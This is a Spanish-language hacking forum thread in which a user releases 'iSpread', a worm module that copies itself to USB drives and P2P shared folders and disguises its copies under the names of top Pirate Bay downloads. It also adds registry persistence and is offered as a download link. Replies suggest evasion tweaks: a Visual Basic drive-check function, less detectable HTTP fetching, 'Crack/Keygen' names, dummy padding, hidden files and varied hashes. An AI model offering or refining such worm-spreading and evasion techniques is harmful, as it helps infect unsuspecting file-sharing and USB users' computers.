iSpread Module

Iniciado por skyweb07, 15 Agosto 2009, 05:18 AM

0 Miembros y 1 Visitante están viendo este tema.

skyweb07

Bueno son las 3:56 de la mañana.. algo tarde pero es que he estado trabajando en algo que me ha llevado un buen rato porque he tenido que instalar todos los clientes p2p más usados por las personas para poder obtener las rutas del registro y asi poder patchear las carpetas compartidas de cada una, este modulo que les traigo aqui es un spreader, pero es y no es a la misma vez un simple spreader les explico porque :

* USB Spread : Es una modificación del modulo anterior del iUSB pero con la nueva caracteristica que comprueba si el dispositivo esta listo y asi se pueda autocopiar satisfactoriamente



* P2P Spread : Esta es la parte que más me costo trabajo , por que?

1- Tuve que instalar todos los fucking clientes p2p que ven a continuación



Esa es una imagen de la WMware con los clientes p2p instalados, eso fue necesario para poder obtener las entradas del registro de cada uno de ellos.

2- Como saben casi todos los spreaders que hay por ahi lo que hacen es coger y autocopiarse a la carpeta definida de cada uno de estos clientes, pues este spreader es distinto ya que obtiene la ruta directamente del registro con lo cual si existe el cliente p2p en el pc y el usuario cambio la ruta default del cliente se va a autocopiar de todas formas .

3- Y lo último y mejor... Obtiene los nombres del TOP de 100 Softwares y 100 Juegos más descargados de Thepiratebay y se autocopia con los mismos a las todas las carpetas P2P , si existe el archivo no se copia pero sino pasa algo como esto :





Jaja bonito no...

Y ya al final por aburrimiento le puse un addon para añadirse a las entradas del registro para que quedara algo asi :



..... Pués nada chicos este modulo de spread me ha costado algo de trabajo.. ahora si que no se pueden quejar porque no tienen para propagar su server por todas las redes de internet jeje ... Saludos a todos ;)

Link de descarga : http://exponelo.com/files/QRBIPGCB/iSpread.rar

YST

Lo que seria interesante seria el spread de MSN mediante api hoocking , a ver si te animas y lo haces :D ;)


Yo le enseñe a Kayser a usar objetos en ASM

Karcrack

#2
Buen trabajo, ahora me bajo el codigo y te digo si veo algo que mejorar ;)


-Ordena mas tus codigos... Utiliza las tabulaciones...
-No me gusta la manera de saber si la unidad esta disponible... creo que esta es mejor:
Código (vb) [Seleccionar]
Public Function IsDriverReady(ByVal sDrive As String) As Boolean
   If Right$(sDrive, 2) <> ":\" Then sDrive = Left$(sDrive, 1) & ":\"
   IsDriverReady = CBool(GetVolumeInformation(sDrive, ByVal vbNullString, 0&, 0&, 0&, 0&, ByVal vbNullString, 0&))
End Function

-Usa Option Explicit
-La ruta de la configuracion del Emule deberias sacarla del registro... ya que se puede cambiar...
-Para sacar el codigo HTML de alguna web seria menos detectable si usaras WinHTTP (la .dll, no .ocx, asi no hay dependencias, ya que esta en todos los PCs a partir del W$ 98 ;))
-Es muy sospechoso tener 100 archivos con el mismo icono y diferente nombre... talvez deberias solo obtener 5 nombres de forma aleatoria...
-Creo que seria mas interesante añadir Crack/Keygen delante del nombre.... ya que el software/juego pesa bastante mas que el EXE...

Saludos ;)

Tengu

voy a checarlo.

aunque deberias ver lo del nombre xk anda otro code por hay que es Ispread bot worm el cual posee caracteristicas parecidas a este modulo

Encuentros por Video y Chat !!

BlackZeroX

#4
Cita de: skyweb07 en 15 Agosto 2009, 05:18 AM

Yo arreglaria aùn màs tu codigo!¡.

Dulces Lunas
The Dark Shadow is my passion.

[GB]

Lo ideal seria zipear todos los ejecutables generados para disimular xD

BlackZeroX

#6
Cita de: [GB] en 16 Agosto 2009, 22:34 PM
Lo ideal seria zipear todos los ejecutables generados para disimular xD

que tanto te crees realmente?, es mejor llenarlo con un dummy al final del exe y q cambie de icono, el zip no tanto, ya que un archivo dummy de 1 gb en un zip se reduce como a 100 kbs o menos aun!¡.
The Dark Shadow is my passion.

Karcrack

Cita de: BlackZeroX en 16 Agosto 2009, 23:44 PM
Cita de: [GB] en 16 Agosto 2009, 22:34 PM

que tanto te crees realmente?, es mejor llenarlo con un dummy al final del exe y q cambie de icono, el zip no tanto, ya que un archivo dummy de 1 gb en un zip se reduce como a 100 kbs o menos aun!¡.
No es necesario en absoluto cambiar el icono, al menos no en la parte remota... me refiero a la persona que descargara el fichero de la red P2P... Aunque si sabe algo de informatica sospechara al ver un icono del VB en un supuesto juego entero... como dije antes mejor añadir CrackMe/Keygen al nombre del file...

Si no me equivoco se le podrian poner atributos de oculto a los ficheros creados, creo que aun asi el cliente P2P lo agrega a la lista de ficheros para compartir...

Otra cosa... lo del dummy de 1gb que se queda en 100kb.... eso dependera de como hagas el fichero dummy... si pones un String$(5000, "A") el ratio de compresion sera mucho mayor que si metes datos aleatorios...

[GB]

Cita de: BlackZeroX en 16 Agosto 2009, 23:44 PM
Cita de: [GB] en 16 Agosto 2009, 22:34 PM
Lo ideal seria zipear todos los ejecutables generados para disimular xD

que tanto te crees realmente?, es mejor llenarlo con un dummy al final del exe y q cambie de icono, el zip no tanto, ya que un archivo dummy de 1 gb en un zip se reduce como a 100 kbs o menos aun!¡.

No por eso, sino para que quede menos sospechoso xD, hace un tiempo recuerdo que algunos clientes p2p filtraban los archivos con extensiones .exe bat com etc por seguridad no se ahora XD...

[VolkS]

Te hago una pregunta porque no vi el codigo, el spread a cada .exe que genera la cambia el hash md5?, porque los clientes p2p chequean el hash de cada archivo, y si son iguales solamente comparte uno